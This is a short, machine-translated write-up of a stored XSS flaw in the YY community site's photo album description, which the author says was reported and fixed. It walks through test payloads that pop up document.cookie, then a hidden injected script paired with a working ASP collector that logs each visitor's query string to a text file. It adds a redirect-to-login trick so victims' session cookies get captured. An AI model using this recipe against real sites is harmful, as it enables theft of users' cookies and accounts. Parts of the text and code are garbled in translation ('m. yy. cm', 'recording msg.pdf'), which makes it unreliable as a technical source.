Attackers can exploit the XSS vulnerability in the yycommunity to obtain and store user cookies.

Author B0mbErM @ n

The vulnerability has been submitted to the official website a few days ago and has been fixed. For more information, see the figure below.

-
Introduction:
XSS is implemented through the album function of yycommunity [m.yy.com.
This method is used in many places to obtain and store valid cookies of visitors.
-
Verify XSS:
Log on to [m. yy. cm] and apply for a contract. After applying, you can have your own YY space.
Click Open album> upload photo> open photo after upload> edit description> insert XSS statement.
The most basic XSS Statement> <script> alert (/B0mbErM @ n/) </script>
After the verification is passed, a dialog box is displayed, prompting/B0mbErM @ n/. We can perform the next verification.

-
Deep verification XSS:
Edit the file to <script> alert (document. cookie) </script>.
In this pop-up window, the cookie value will display username, password, and other information.

-
Use XSS to store cookies:
Insert XSS statement <script> document. write (); </script>
Where the B0mberM@n.asp is a file, website is a Web site. we need to put the asp file into an accessible website. when you access the XSS page, the asp program is executed and the prompt box is not displayed, which is hidden.
-
B0mberM@n.asp program code:
<%
Msg = Request. ServerVariables ("QUERY_STRING ")
Testfile = Server. MapPath ("B0mberM@n.txt ")
Set fs = server. CreateObject ("scripting. filesystemobject ")
Set thisfile = fs. OpenTextFile (testfile, 8, True, 0)
Thisfile. Writeline ("" & msg &"")
Thisfile. close
Set fs = nothing
%>
Note: The b0mberm@n.txt file in the program directory will be stored in the recording msg.pdf.
-
Further expansion:
Of course, the user may not log on and then visit our XSS page, in order to make it login and then access, we can add an automatic jump page at the end of the B0mbErM@n.asp to the login page, the other party will subconsciously log on and open the page containing XSS statements again. then we get the visitor's cookie. (there are a lot of automatic jump code in ASP. Here we will not give an example here. You will see more, better, and more detailed code at Google)